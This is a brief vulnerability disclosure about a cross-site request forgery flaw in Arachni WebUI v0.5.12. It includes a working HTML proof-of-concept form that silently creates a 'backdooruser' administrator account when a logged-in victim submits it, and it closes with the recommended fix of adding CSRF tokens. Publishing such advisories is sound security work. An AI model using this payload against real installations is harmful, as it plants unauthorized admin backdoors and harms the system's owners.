CSRF vulnerability: rule/config manipulation and backdoor implementation

[dfezza]

Vulnerable components: Arachni c1.5.1 - WebUI v0.5.12

Steps:

1. Victim login Arachni account first.
2. An attacker sends a form/link to the victim.
3. If the victim clicks the form/link, an item (rule set or new user) would automatically change the rule set or add a new user (backdoor) to victim's configuration.

Cross-Site Request Forgery (CSRF) PoC to add a backdoor-account:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:9292/users" method="POST">
      <input type="hidden" name="utf8" value="â&#156;&#147;" />
      <input type="hidden" name="authenticity&#95;token" value="MjWHU198l&#47;sSd&#47;2IKpPJWDuv1WJziw90AuNHj3pMrO&#47;uyidswqmseuhavNrwsuHp0UfSs5uC8IEtaq3TxHflWg&#61;&#61;" />
      <input type="hidden" name="user&#91;name&#93;" value="backdooruser" />
      <input type="hidden" name="user&#91;password&#93;" value="backdooruser" />
      <input type="hidden" name="user&#91;email&#93;" value="backdooruser&#64;backdooruser&#46;com" />
      <input type="hidden" name="user&#91;password&#95;confirmation&#93;" value="backdooruser" />
      <input type="hidden" name="user&#91;role&#95;ids&#93;&#91;&#93;" value="1" />
      <input type="hidden" name="user&#91;role&#95;ids&#93;&#91;&#93;" value="" />
      <input type="hidden" name="commit" value="Create&#32;User" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Solution: Add a CSRF-token to the post forms.